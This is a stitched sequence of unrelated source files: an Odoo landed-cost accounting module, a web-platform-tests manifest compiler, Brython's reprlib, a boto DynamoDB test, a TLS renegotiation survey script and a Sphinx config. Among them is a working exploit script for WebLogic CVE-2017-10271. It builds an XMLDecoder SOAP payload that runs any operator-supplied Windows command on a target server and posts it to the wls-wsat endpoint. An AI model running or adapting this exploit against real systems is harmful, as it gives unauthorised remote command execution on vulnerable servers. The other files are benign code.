debit_line['debit'] = diff credit_line['credit'] = diff else: # negative cost, reverse the entry debit_line['credit'] = -diff credit_line['debit'] = -diff aml_obj.create(cr, uid, debit_line, context=context) aml_obj.create(cr, uid, credit_line, context=context) # Ugly work-around to know if anglo-saxon accounting is used. In 9.0, we can use the # field 'anglo_saxon_accounting' on the company. if hasattr(self.pool['account.invoice.line'], '_anglo_saxon_sale_move_lines'): debit_line = dict(base_line, name=(line.name + ": " + str(qty_out) + _(' already out')), quantity=qty_out, account_id=credit_account_id) credit_line = dict(base_line, name=(line.name + ": " + str(qty_out) + _(' already out')), quantity=qty_out, account_id=already_out_account_id) if diff > 0: debit_line['debit'] = diff credit_line['credit'] = diff else: # negative cost, reverse the entry debit_line['credit'] = -diff credit_line['debit'] = -diff aml_obj.create(cr, uid, debit_line, context=context) aml_obj.create(cr, uid, credit_line, context=context) return True def _create_account_move(self, cr, uid, cost, context=None): vals = { 'journal_id': cost.account_journal_id.id, 'period_id': self.pool.get('account.period').find(cr, uid, cost.date, context=context)[0], 'date': cost.date, 'ref': cost.name } return self.pool.get('account.move').create(cr, uid, vals, context=context) def _check_sum(self, cr, uid, landed_cost, context=None): """ Will check if each cost line its valuation lines sum to the correct amount and if the overall total amount is correct also """ costcor = {} tot = 0 for valuation_line in landed_cost.valuation_adjustment_lines: if costcor.get(valuation_line.cost_line_id): costcor[valuation_line.cost_line_id] += valuation_line.additional_landed_cost else: costcor[valuation_line.cost_line_id] = valuation_line.additional_landed_cost tot += valuation_line.additional_landed_cost prec = self.pool['decimal.precision'].precision_get(cr, uid, 'Account') # float_compare returns 0 for equal amounts res = not bool(float_compare(tot, landed_cost.amount_total, precision_digits=prec)) for costl in costcor.keys(): if float_compare(costcor[costl], costl.price_unit, precision_digits=prec): res = False return res def button_validate(self, cr, uid, ids, context=None): quant_obj = self.pool.get('stock.quant') for cost in self.browse(cr, uid, ids, context=context): if cost.state != 'draft': raise Warning(_('Only draft landed costs can be validated')) if not cost.valuation_adjustment_lines or not self._check_sum(cr, uid, cost, context=context): raise osv.except_osv(_('Error!'), _('You cannot validate a landed cost which has no valid valuation lines.')) move_id = self._create_account_move(cr, uid, cost, context=context) for line in cost.valuation_adjustment_lines: if not line.move_id: continue per_unit = line.final_cost / line.quantity diff = per_unit - line.former_cost_per_unit # If the precision required for the variable diff is larger than the accounting # precision, inconsistencies between the stock valuation and the accounting entries # may arise. # For example, a landed cost of 15 divided in 13 units. If the products leave the # stock one unit at a time, the amount related to the landed cost will correspond to # round(15/13, 2)*13 = 14.95. To avoid this case, we split the quant in 12 + 1, then # record the difference on the new quant. # We need to make sure to able to extract at least one unit of the product. There is # an arbitrary minimum quantity set to 2.0 from which we consider we can extract a # unit and adapt the cost. curr_rounding = line.move_id.company_id.currency_id.rounding diff_rounded = float_round(diff, precision_rounding=curr_rounding) diff_correct = diff_rounded quants = line.move_id.quant_ids.sorted(key=lambda r: r.qty, reverse=True) quant_correct = False if quants\ and float_compare(quants[0].product_id.uom_id.rounding, 1.0, precision_digits=1) == 0\ and float_compare(line.quantity * diff, line.quantity * diff_rounded, precision_rounding=curr_rounding) != 0\ and float_compare(quants[0].qty, 2.0, precision_rounding=quants[0].product_id.uom_id.rounding) >= 0: # Search for existing quant of quantity = 1.0 to avoid creating a new one quant_correct = quants.filtered(lambda r: float_compare(r.qty, 1.0, precision_rounding=quants[0].product_id.uom_id.rounding) == 0) if not quant_correct: quant_correct = quant_obj._quant_split(cr, uid, quants[0], quants[0].qty - 1.0, context=context) else: quant_correct = quant_correct[0] quants = quants - quant_correct diff_correct += (line.quantity * diff) - (line.quantity * diff_rounded) diff = diff_rounded quant_dict = {} for quant in quants: quant_dict[quant.id] = quant.cost + diff if quant_correct: quant_dict[quant_correct.id] = quant_correct.cost + diff_correct for key, value in quant_dict.items(): quant_obj.write(cr, SUPERUSER_ID, key, {'cost': value}, context=context) qty_out = 0 for quant in line.move_id.quant_ids: if quant.location_id.usage != 'internal': qty_out += quant.qty self._create_accounting_entries(cr, uid, line, move_id, qty_out, context=context) self.write(cr, uid, cost.id, {'state': 'done', 'account_move_id': move_id}, context=context) return True def button_cancel(self, cr, uid, ids, context=None): cost = self.browse(cr, uid, ids, context=context) if cost.state == 'done': raise Warning(_('Validated landed costs cannot be cancelled, ' 'but you could create negative landed costs to reverse them')) return cost.write({'state': 'cancel'}) def unlink(self, cr, uid, ids, context=None): # cancel or raise first self.button_cancel(cr, uid, ids, context) return super(stock_landed_cost, self).unlink(cr, uid, ids, context=context) def compute_landed_cost(self, cr, uid, ids, context=None): line_obj = self.pool.get('stock.valuation.adjustment.lines') unlink_ids = line_obj.search(cr, uid, [('cost_id', 'in', ids)], context=context) line_obj.unlink(cr, uid, unlink_ids, context=context) digits = dp.get_precision('Product Price')(cr) towrite_dict = {} for cost in self.browse(cr, uid, ids, context=None): if not cost.picking_ids: continue picking_ids = [p.id for p in cost.picking_ids] total_qty = 0.0 total_cost = 0.0 total_weight = 0.0 total_volume = 0.0 total_line = 0.0 vals = self.get_valuation_lines(cr, uid, [cost.id], picking_ids=picking_ids, context=context) for v in vals: for line in cost.cost_lines: v.update({'cost_id': cost.id, 'cost_line_id': line.id}) self.pool.get('stock.valuation.adjustment.lines').create(cr, uid, v, context=context) total_qty += v.get('quantity', 0.0) total_cost += v.get('former_cost', 0.0) total_weight += v.get('weight', 0.0) total_volume += v.get('volume', 0.0) total_line += 1 for line in cost.cost_lines: value_split = 0.0 for valuation in cost.valuation_adjustment_lines: value = 0.0 if valuation.cost_line_id and valuation.cost_line_id.id == line.id: if line.split_method == 'by_quantity' and total_qty: per_unit = (line.price_unit / total_qty) value = valuation.quantity * per_unit elif line.split_method == 'by_weight' and total_weight: per_unit = (line.price_unit / total_weight) value = valuation.weight * per_unit elif line.split_method == 'by_volume' and total_volume: per_unit = (line.price_unit / total_volume) value = valuation.volume * per_unit elif line.split_method == 'equal': value = (line.price_unit / total_line) elif line.split_method == 'by_current_cost_price' and total_cost: per_unit = (line.price_unit / total_cost) value = valuation.former_cost * per_unit else: value = (line.price_unit / total_line) if digits: value = float_round(value, precision_digits=digits[1], rounding_method='UP') fnc = min if line.price_unit > 0 else max value = fnc(value, line.price_unit - value_split) value_split += value if valuation.id not in towrite_dict: towrite_dict[valuation.id] = value else: towrite_dict[valuation.id] += value if towrite_dict: for key, value in towrite_dict.items(): line_obj.write(cr, uid, key, {'additional_landed_cost': value}, context=context) return True class stock_landed_cost_lines(osv.osv): _name = 'stock.landed.cost.lines' _description = 'Stock Landed Cost Lines' def onchange_product_id(self, cr, uid, ids, product_id=False, context=None): result = {} if not product_id: return {'value': {'quantity': 0.0, 'price_unit': 0.0}} product = self.pool.get('product.product').browse(cr, uid, product_id, context=context) result['name'] = product.name result['split_method'] = product.split_method result['price_unit'] = product.standard_price result['account_id'] = product.property_account_expense and product.property_account_expense.id or product.categ_id.property_account_expense_categ.id return {'value': result} _columns = { 'name': fields.char('Description'), 'cost_id': fields.many2one('stock.landed.cost', 'Landed Cost', required=True, ondelete='cascade'), 'product_id': fields.many2one('product.product', 'Product', required=True), 'price_unit': fields.float('Cost', required=True, digits_compute=dp.get_precision('Product Price')), 'split_method': fields.selection(product.SPLIT_METHOD, string='Split Method', required=True), 'account_id': fields.many2one('account.account', 'Account', domain=[('type', '<>', 'view'), ('type', '<>', 'closed')]), } class stock_valuation_adjustment_lines(osv.osv): _name = 'stock.valuation.adjustment.lines' _description = 'Stock Valuation Adjustment Lines' def _amount_final(self, cr, uid, ids, name, args, context=None): result = {} for line in self.browse(cr, uid, ids, context=context): result[line.id] = { 'former_cost_per_unit': 0.0, 'final_cost': 0.0, } result[line.id]['former_cost_per_unit'] = (line.former_cost / line.quantity if line.quantity else 1.0) result[line.id]['final_cost'] = (line.former_cost + line.additional_landed_cost) return result def _get_name(self, cr, uid, ids, name, arg, context=None): res = {} for line in self.browse(cr, uid, ids, context=context): res[line.id] = line.product_id.code or line.product_id.name or '' if line.cost_line_id: res[line.id] += ' - ' + line.cost_line_id.name return res _columns = { 'name': fields.function(_get_name, type='char', string='Description', store=True), 'cost_id': fields.many2one('stock.landed.cost', 'Landed Cost', required=True, ondelete='cascade'), 'cost_line_id': fields.many2one('stock.landed.cost.lines', 'Cost Line', readonly=True), 'move_id': fields.many2one('stock.move', 'Stock Move', readonly=True), 'product_id': fields.many2one('product.product', 'Product', required=True), 'quantity': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), required=True), 'weight': fields.float('Weight', digits_compute=dp.get_precision('Product Unit of Measure')), 'volume': fields.float('Volume', digits_compute=dp.get_precision('Product Unit of Measure')), 'former_cost': fields.float('Former Cost', digits_compute=dp.get_precision('Product Price')), 'former_cost_per_unit': fields.function(_amount_final, multi='cost', string='Former Cost(Per Unit)', type='float', store=True, digits=0), 'additional_landed_cost': fields.float('Additional Landed Cost', digits_compute=dp.get_precision('Product Price')), 'final_cost': fields.function(_amount_final, multi='cost', string='Final Cost', type='float', store=True, digits=0), } _defaults = { 'quantity': 1.0, 'weight': 1.0, 'volume': 1.0, } # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
askeing/servo
tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/wptmanifest/backends/static.py
29
6487
import operator from ..node import NodeVisitor from ..parser import parse class Compiler(NodeVisitor): """Compiler backend that evaluates conditional expressions to give static output""" def compile(self, tree, expr_data, data_cls_getter=None, **kwargs): """Compile a raw AST into a form with conditional expressions evaluated. tree - The root node of the wptmanifest AST to compile expr_data - A dictionary of key / value pairs to use when evaluating conditional expressions data_cls_getter - A function taking two parameters; the previous output node and the current ast node and returning the class of the output node to use for the current ast node """ self._kwargs = kwargs self.expr_data = expr_data if data_cls_getter is None: self.data_cls_getter = lambda x, y: ManifestItem else: self.data_cls_getter = data_cls_getter self.output_node = None self.visit(tree) return self.output_node def visit_DataNode(self, node): output_parent = self.output_node if self.output_node is None: assert node.parent is None self.output_node = self.data_cls_getter(None, None)(None, **self._kwargs) else: self.output_node = self.data_cls_getter(self.output_node, node)(node.data) for child in node.children: self.visit(child) if output_parent is not None: output_parent.append(self.output_node) self.output_node = self.output_node.parent def visit_KeyValueNode(self, node): key_name = node.data key_value = None for child in node.children: value = self.visit(child) if value is not None: key_value = value break if key_value is not None: self.output_node.set(key_name, key_value) def visit_ValueNode(self, node): return node.data def visit_AtomNode(self, node): return node.data def visit_ListNode(self, node): return [self.visit(child) for child in node.children] def visit_ConditionalNode(self, node): assert len(node.children) == 2 if self.visit(node.children[0]): return self.visit(node.children[1]) def visit_StringNode(self, node): value = node.data for child in node.children: value = self.visit(child)(value) return value def visit_NumberNode(self, node): if "." in node.data: return float(node.data) else: return int(node.data) def visit_VariableNode(self, node): value = self.expr_data[node.data] for child in node.children: value = self.visit(child)(value) return value def visit_IndexNode(self, node): assert len(node.children) == 1 index = self.visit(node.children[0]) return lambda x: x[index] def visit_UnaryExpressionNode(self, node): assert len(node.children) == 2 operator = self.visit(node.children[0]) operand = self.visit(node.children[1]) return operator(operand) def visit_BinaryExpressionNode(self, node): assert len(node.children) == 3 operator = self.visit(node.children[0]) operand_0 = self.visit(node.children[1]) operand_1 = self.visit(node.children[2]) return operator(operand_0, operand_1) def visit_UnaryOperatorNode(self, node): return {"not": operator.not_}[node.data] def visit_BinaryOperatorNode(self, node): return {"and": operator.and_, "or": operator.or_, "==": operator.eq, "!=": operator.ne}[node.data] class ManifestItem(object): def __init__(self, name, **kwargs): self.parent = None self.name = name self.children = [] self._data = {} def __repr__(self): return "<ManifestItem %s>" % (self.name) def __str__(self): rv = [repr(self)] for item in self.children: rv.extend(" %s" % line for line in str(item).split("\n")) return "\n".join(rv) def set_defaults(self): pass @property def is_empty(self): if self._data: return False return all(child.is_empty for child in self.children) @property def root(self): node = self while node.parent is not None: node = node.parent return node def has_key(self, key): for node in [self, self.root]: if key in node._data: return True return False def get(self, key): for node in [self, self.root]: if key in node._data: return node._data[key] raise KeyError def set(self, name, value): self._data[name] = value def remove(self): if self.parent: self.parent._remove_child(self) def _remove_child(self, child): self.children.remove(child) child.parent = None def iterchildren(self, name=None): for item in self.children: if item.name == name or name is None: yield item def _flatten(self): rv = {} for node in [self, self.root]: for name, value in node._data.iteritems(): if name not in rv: rv[name] = value return rv def iteritems(self): for item in self._flatten().iteritems(): yield item def iterkeys(self): for item in self._flatten().iterkeys(): yield item def itervalues(self): for item in self._flatten().itervalues(): yield item def append(self, child): child.parent = self self.children.append(child) return child def compile_ast(ast, expr_data, data_cls_getter=None, **kwargs): return Compiler().compile(ast, expr_data, data_cls_getter=data_cls_getter, **kwargs) def compile(stream, expr_data, data_cls_getter=None, **kwargs): return compile_ast(parse(stream), expr_data, data_cls_getter=data_cls_getter, **kwargs)
mpl-2.0
d40223223/2015cdbg6-40223223
static/Brython3.1.1-20150328-091302/Lib/reprlib.py
923
5110
"""Redo the builtin repr() (representation) but with limits on most sizes.""" __all__ = ["Repr", "repr", "recursive_repr"] import builtins from itertools import islice try: from _thread import get_ident except ImportError: from _dummy_thread import get_ident def recursive_repr(fillvalue='...'): 'Decorator to make a repr function return fillvalue for a recursive call' def decorating_function(user_function): repr_running = set() def wrapper(self): key = id(self), get_ident() if key in repr_running: return fillvalue repr_running.add(key) try: result = user_function(self) finally: repr_running.discard(key) return result # Can't use functools.wraps() here because of bootstrap issues wrapper.__module__ = getattr(user_function, '__module__') wrapper.__doc__ = getattr(user_function, '__doc__') wrapper.__name__ = getattr(user_function, '__name__') wrapper.__annotations__ = getattr(user_function, '__annotations__', {}) return wrapper return decorating_function class Repr: def __init__(self): self.maxlevel = 6 self.maxtuple = 6 self.maxlist = 6 self.maxarray = 5 self.maxdict = 4 self.maxset = 6 self.maxfrozenset = 6 self.maxdeque = 6 self.maxstring = 30 self.maxlong = 40 self.maxother = 30 def repr(self, x): return self.repr1(x, self.maxlevel) def repr1(self, x, level): typename = type(x).__name__ if ' ' in typename: parts = typename.split() typename = '_'.join(parts) if hasattr(self, 'repr_' + typename): return getattr(self, 'repr_' + typename)(x, level) else: return self.repr_instance(x, level) def _repr_iterable(self, x, level, left, right, maxiter, trail=''): n = len(x) if level <= 0 and n: s = '...' else: newlevel = level - 1 repr1 = self.repr1 pieces = [repr1(elem, newlevel) for elem in islice(x, maxiter)] if n > maxiter: pieces.append('...') s = ', '.join(pieces) if n == 1 and trail: right = trail + right return '%s%s%s' % (left, s, right) def repr_tuple(self, x, level): return self._repr_iterable(x, level, '(', ')', self.maxtuple, ',') def repr_list(self, x, level): return self._repr_iterable(x, level, '[', ']', self.maxlist) def repr_array(self, x, level): header = "array('%s', [" % x.typecode return self._repr_iterable(x, level, header, '])', self.maxarray) def repr_set(self, x, level): x = _possibly_sorted(x) return self._repr_iterable(x, level, 'set([', '])', self.maxset) def repr_frozenset(self, x, level): x = _possibly_sorted(x) return self._repr_iterable(x, level, 'frozenset([', '])', self.maxfrozenset) def repr_deque(self, x, level): return self._repr_iterable(x, level, 'deque([', '])', self.maxdeque) def repr_dict(self, x, level): n = len(x) if n == 0: return '{}' if level <= 0: return '{...}' newlevel = level - 1 repr1 = self.repr1 pieces = [] for key in islice(_possibly_sorted(x), self.maxdict): keyrepr = repr1(key, newlevel) valrepr = repr1(x[key], newlevel) pieces.append('%s: %s' % (keyrepr, valrepr)) if n > self.maxdict: pieces.append('...') s = ', '.join(pieces) return '{%s}' % (s,) def repr_str(self, x, level): s = builtins.repr(x[:self.maxstring]) if len(s) > self.maxstring: i = max(0, (self.maxstring-3)//2) j = max(0, self.maxstring-3-i) s = builtins.repr(x[:i] + x[len(x)-j:]) s = s[:i] + '...' + s[len(s)-j:] return s def repr_int(self, x, level): s = builtins.repr(x) # XXX Hope this isn't too slow... if len(s) > self.maxlong: i = max(0, (self.maxlong-3)//2) j = max(0, self.maxlong-3-i) s = s[:i] + '...' + s[len(s)-j:] return s def repr_instance(self, x, level): try: s = builtins.repr(x) # Bugs in x.__repr__() can cause arbitrary # exceptions -- then make up something except Exception: return '<%s instance at %x>' % (x.__class__.__name__, id(x)) if len(s) > self.maxother: i = max(0, (self.maxother-3)//2) j = max(0, self.maxother-3-i) s = s[:i] + '...' + s[len(s)-j:] return s def _possibly_sorted(x): # Since not all sequences of items can be sorted and comparison # functions may raise arbitrary exceptions, return an unsorted # sequence in that case. try: return sorted(x) except Exception: return list(x) aRepr = Repr() repr = aRepr.repr
gpl-3.0
jm33-m0/massExpConsole
exploits/weblogic/weblogic_cve-2017-10271.py
1
3050
#!/usr/bin/python3 # pylint: disable=invalid-name, line-too-long, import-error, no-member, missing-docstring, broad-except import argparse import sys import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def payload_command(command_in): html_escape_table = { "&": "&amp;", '"': "&quot;", "'": "&apos;", ">": "&gt;", "<": "&lt;", } command_filtered = "<string>" + \ "".join(html_escape_table.get(c, c) for c in command_in)+"</string>" payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \ " <soapenv:Header> " \ " <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \ " <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \ " <void class=\"java.lang.ProcessBuilder\"> \n" \ " <array class=\"java.lang.String\" length=\"3\">" \ " <void index = \"0\"> " \ " <string>cmd</string> " \ " </void> " \ " <void index = \"1\"> " \ " <string>/c</string> " \ " </void> " \ " <void index = \"2\"> " \ + command_filtered + \ " </void> " \ " </array>" \ " <void method=\"start\"/>" \ " </void>" \ " </java>" \ " </work:WorkContext>" \ " </soapenv:Header>" \ " <soapenv:Body/>" \ "</soapenv:Envelope>" return payload_1 def do_post(urlin, command_in): payload_url = urlin + "/wls-wsat/CoordinatorPortType" payload_header = {'content-type': 'text/xml'} result = requests.post(payload_url, payload_command( command_in), headers=payload_header, verify=False) if result.status_code == 500: print("Command Executed\n") else: print("Something Went Wrong\n") parser = argparse.ArgumentParser(description='weblogic_cve-2017-10271') parser.add_argument('-c', type=str, required=True, help='command to execute on the target') parser.add_argument('-t', type=str, required=True, help='target url') args = parser.parse_args() try: command = args.c url_in = "http://" + args.t do_post(url_in, command) except (KeyboardInterrupt, EOFError, SystemExit): sys.exit(0)
gpl-3.0
TiVoMaker/boto
tests/unit/dynamodb/test_types.py
74
6285
#!/usr/bin/env python # Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # from decimal import Decimal from tests.compat import unittest from boto.compat import six from boto.dynamodb import types from boto.dynamodb.exceptions import DynamoDBNumberError class TestDynamizer(unittest.TestCase): def setUp(self): pass def test_encoding_to_dynamodb(self): dynamizer = types.Dynamizer() self.assertEqual(dynamizer.encode('foo'), {'S': 'foo'}) self.assertEqual(dynamizer.encode(54), {'N': '54'}) self.assertEqual(dynamizer.encode(Decimal('1.1')), {'N': '1.1'}) self.assertEqual(dynamizer.encode(set([1, 2, 3])), {'NS': ['1', '2', '3']}) self.assertIn(dynamizer.encode(set(['foo', 'bar'])), ({'SS': ['foo', 'bar']}, {'SS': ['bar', 'foo']})) self.assertEqual(dynamizer.encode(types.Binary(b'\x01')), {'B': 'AQ=='}) self.assertEqual(dynamizer.encode(set([types.Binary(b'\x01')])), {'BS': ['AQ==']}) self.assertEqual(dynamizer.encode(['foo', 54, [1]]), {'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]}) self.assertEqual(dynamizer.encode({'foo': 'bar', 'hoge': {'sub': 1}}), {'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}}) self.assertEqual(dynamizer.encode(None), {'NULL': True}) self.assertEqual(dynamizer.encode(False), {'BOOL': False}) def test_decoding_to_dynamodb(self): dynamizer = types.Dynamizer() self.assertEqual(dynamizer.decode({'S': 'foo'}), 'foo') self.assertEqual(dynamizer.decode({'N': '54'}), 54) self.assertEqual(dynamizer.decode({'N': '1.1'}), Decimal('1.1')) self.assertEqual(dynamizer.decode({'NS': ['1', '2', '3']}), set([1, 2, 3])) self.assertEqual(dynamizer.decode({'SS': ['foo', 'bar']}), set(['foo', 'bar'])) self.assertEqual(dynamizer.decode({'B': 'AQ=='}), types.Binary(b'\x01')) self.assertEqual(dynamizer.decode({'BS': ['AQ==']}), set([types.Binary(b'\x01')])) self.assertEqual(dynamizer.decode({'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]}), ['foo', 54, [1]]) self.assertEqual(dynamizer.decode({'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}}), {'foo': 'bar', 'hoge': {'sub': 1}}) self.assertEqual(dynamizer.decode({'NULL': True}), None) self.assertEqual(dynamizer.decode({'BOOL': False}), False) def test_float_conversion_errors(self): dynamizer = types.Dynamizer() # When supporting decimals, certain floats will work: self.assertEqual(dynamizer.encode(1.25), {'N': '1.25'}) # And some will generate errors, which is why it's best # to just use Decimals directly: with self.assertRaises(DynamoDBNumberError): dynamizer.encode(1.1) def test_non_boolean_conversions(self): dynamizer = types.NonBooleanDynamizer() self.assertEqual(dynamizer.encode(True), {'N': '1'}) def test_lossy_float_conversions(self): dynamizer = types.LossyFloatDynamizer() # Just testing the differences here, specifically float conversions: self.assertEqual(dynamizer.encode(1.1), {'N': '1.1'}) self.assertEqual(dynamizer.decode({'N': '1.1'}), 1.1) self.assertEqual(dynamizer.encode(set([1.1])), {'NS': ['1.1']}) self.assertEqual(dynamizer.decode({'NS': ['1.1', '2.2', '3.3']}), set([1.1, 2.2, 3.3])) class TestBinary(unittest.TestCase): def test_good_input(self): data = types.Binary(b'\x01') self.assertEqual(b'\x01', data) self.assertEqual(b'\x01', bytes(data)) def test_non_ascii_good_input(self): # Binary data that is out of ASCII range data = types.Binary(b'\x88') self.assertEqual(b'\x88', data) self.assertEqual(b'\x88', bytes(data)) @unittest.skipUnless(six.PY2, "Python 2 only") def test_bad_input(self): with self.assertRaises(TypeError): types.Binary(1) @unittest.skipUnless(six.PY3, "Python 3 only") def test_bytes_input(self): data = types.Binary(1) self.assertEqual(data, b'\x00') self.assertEqual(data.value, b'\x00') @unittest.skipUnless(six.PY2, "Python 2 only") def test_unicode_py2(self): # It's dirty. But remains for backward compatibility. data = types.Binary(u'\x01') self.assertEqual(data, b'\x01') self.assertEqual(bytes(data), b'\x01') # Delegate to built-in b'\x01' == u'\x01' # In Python 2.x these are considered equal self.assertEqual(data, u'\x01') # Check that the value field is of type bytes self.assertEqual(type(data.value), bytes) @unittest.skipUnless(six.PY3, "Python 3 only") def test_unicode_py3(self): with self.assertRaises(TypeError): types.Binary(u'\x01') if __name__ == '__main__': unittest.main()
mit
dingdang2012/tlsprober
analyze/alexa_ev_analyze.py
3
3467
# Copyright 2010-2012 Opera Software ASA # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ''' Created on 2. okt. 2010 @author: Yngve ''' """Report Renego patched/unpatched based on Alexa ranking only sites with EV certificates""" import sys,os,subprocess,time,os.path sys.path.insert(1, os.path.join("..")) import libinit from optparse import OptionParser import probedb.standalone import probedb.probedata2.models as ProbeData import probedb.resultdb2.models as Results options_config = OptionParser() options_config.add_option("--testbase2", action="store_true", dest="use_testbase2") options_config.add_option("--threads", action="store", type="int", dest="threads", default=20) options_config.add_option("--id", action="store", type="int", dest="run_id", default=0) options_config.add_option("--verbose", action="store_true", dest="verbose") (options, args) = options_config.parse_args() if options.run_id: run = ProbeData.ProbeRun.objects.get(id = options.run_id) main_result_list = Results.ResultSummaryList.objects.filter(part_of_run__id=run.id)[0] patched = main_result_list.GetAnalyze( filter = {Results.ResultSummaryList.QUERY_CONDITION:[Results.ResultCondition.RESULTC_RENEGO, Results.ResultCondition.RESULTC_EXTENDED_VALIDATION_CERT]}, summaries = {"hosts":[Results.ResultSummaryList.RESULT_HOSTS]} ) unpatched_renego = main_result_list.GetAnalyze( filter = {Results.ResultSummaryList.QUERY_CONDITION:[Results.ResultCondition.RESULTC_NONRENEGO,Results.ResultCondition.RESULTC_PERFORM_RENEGO, Results.ResultCondition.RESULTC_EXTENDED_VALIDATION_CERT]}, summaries = {"hosts":[Results.ResultSummaryList.RESULT_HOSTS]} ) all = main_result_list.GetAnalyze( filter = {Results.ResultSummaryList.QUERY_CONDITION:[Results.ResultCondition.RESULTC_EXTENDED_VALIDATION_CERT]}, summaries = {"hosts":[Results.ResultSummaryList.RESULT_HOSTS]} ) summary = {} for (update_field, hostlist) in [("total", all),("patched",patched),("unpatched_renego", unpatched_renego)]: for x in hostlist["hosts"]: if x.servername.alexa_rating > 0: summary.setdefault(x.servername.alexa_rating, {"patched":0, "total":0, "unpatched_renego":0})[update_field]+=1 total_patched = 0 total = 0 total_renego = 0 import csv file = csv.writer(open("alexa_ev_renego_rating.csv","wb")) file.writerow(["ranking","site patched", "site total","total patched","total", "patched percent", "unpatched renego", "total unpatched renego", "unpatched renego percent"]) for x,y in sorted(summary.iteritems()): total += y["total"] total_patched += y["patched"] total_renego += y["unpatched_renego"] file.writerow([x, y["patched"], y["total"], total_patched, total, ("%.2f%%" % ((float(total_patched)/float(total))*100.0 if total else 0,)), y["unpatched_renego"], total_renego,("%.2f%%" % ((float(total_renego)/float(total-total_patched))*100.0 if total-total_patched else 0,)), ])
apache-2.0
akiss77/servo
tests/wpt/web-platform-tests/tools/py/doc/conf.py
218
8482
# -*- coding: utf-8 -*- # # py documentation build configuration file, created by # sphinx-quickstart on Thu Oct 21 08:30:10 2010. # # This file is execfile()d with the current directory set to its containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys, os # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. #sys.path.insert(0, os.path.abspath('.')) # -- General configuration ----------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be extensions # coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.viewcode'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.txt' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'py' copyright = u'2010, holger krekel et. al.' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. # The full version, including alpha/beta/rc tags. import py release = py.__version__ version = ".".join(release.split(".")[:2]) # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build'] # The reST default role (used for this markup: `text`) to use for all documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # -- Options for HTML output --------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'default' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to 